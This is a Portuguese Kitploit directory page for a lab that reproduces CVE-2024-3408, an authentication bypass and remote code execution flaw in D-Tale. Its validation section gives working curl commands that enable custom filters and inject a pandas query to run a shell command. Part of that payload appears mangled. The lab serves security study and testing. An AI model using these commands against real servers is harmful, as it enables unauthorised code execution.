Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-3408-dtale — Laboratório de vulnerabilidades para CVE-2024-3408 - Bypass de autenticação e RCE no D-Tale | Kitploit
Ferramentas/GitHubGitHub/flame-11/cve-2024-3408-dtale
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

Laboratório de vulnerabilidades para CVE-2024-3408 - Bypass de autenticação e RCE no D-Tale

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-3408 - Bypass de Autenticação e RCE no D-Tale

Ambiente de laboratório reproduzível para CVE-2024-3408, uma vulnerabilidade de bypass de autenticação e execução remota de código no D-Tale.

Vulnerabilidade

Versões do D-Tale até 3.15.1 são vulneráveis devido a:

  1. SECRET_KEY fixa ("Dtale") para assinatura de sessão Flask - permite falsificação de cookies de sessão
  2. Execução de código via filtros personalizados - o endpoint test-filter usa pandas query, que pode ser abusado para executar código Python arbitrário

CVSS: 9.8 (Crítica)
Afetado: D-Tale <= 3.15.1

Início Rápido

root@kitploit:~
docker compose up -d --build

D-Tale estará disponível em http://localhost:40000

Validação

root@kitploit:~
# Step 1: Enable custom filters
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Expected: {"success":true}

# Step 2: Execute command via pandas query injection
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
  --data-urlencode "[email protected].__import__('os').popen('id').read()"
# Expected: Response contains "uid=" and "gid=" (command output in error message)

Limpeza

root@kitploit:~
docker compose down

Referências

  • Relatório do Huntr (CVE-2024-3408)
  • Relatório do Huntr (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

Aviso Legal

Este laboratório é apenas para fins educacionais e de testes de segurança autorizados. Não use contra sistemas que você não possui ou para os quais não tem permissão para testar.

Baixar ferramenta